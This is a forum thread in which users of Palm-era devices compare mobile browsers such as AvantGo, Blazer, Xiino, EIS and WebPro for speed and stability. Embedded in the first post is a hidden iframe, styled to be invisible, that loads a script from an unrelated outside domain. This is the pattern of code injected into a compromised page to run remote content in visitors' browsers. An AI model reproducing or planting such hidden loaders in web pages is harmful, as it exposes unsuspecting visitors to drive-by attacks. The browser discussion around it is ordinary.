Which browser is best?

Which broswer do you find the most effective in general both speed-wise of displaying web sites as well as NO or VERY FEW errors/soft resets caused by it?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I voted Avantgo, but I use Blazer almost as much. A lot depends on what site I am looking at. Blazer can view WAP sites and has bookmarks, but Avantgo is faster and I think it handles graphics just a little better.

EIS is just too slow and error prone in it's current state.

I tried Xiino several months ago and had some problems. didn't feel at the time it was worth the registration fee, but I might try it again.

I also voted for Avantgo as the best overall. It does handle graphics very well but it really needs bookmarks.

Alan summed it up well but here is my take:

1. EIS is a waste of ROM. What were they thinking?

2. Blazer is pretty good -- I got a free copy when I was with Sprint but it is slow as compared to Xiino and Avantgo. I didn't add it to my Verzion 7135 but did use it a few times with my pre-Verizon 7135 phone.

3. Xiino is fast when it is working. I registered it with a little regret given the lockups I've had lately.

4. Eudora Web is still fastest for text only sites, IMO, but there are too many limitations to vote it as "the best".

I agree EIS is way too slow.

I tried Xiino, and worked well for a few days. Then caused a soft reset, and unable to keep the connection. Get timeout errors.

Just downloaded Blazer and so far, seems to work well, speed similar to Xiino.

Not tried Avantgo...... yet.

WebPro

I agree with WebPro. I have it from my old Tungsten. I thought it was an OS 5-only app, but I installed it and it works really well.

I selected "Other" for the poll. My vote goes to WebPro.
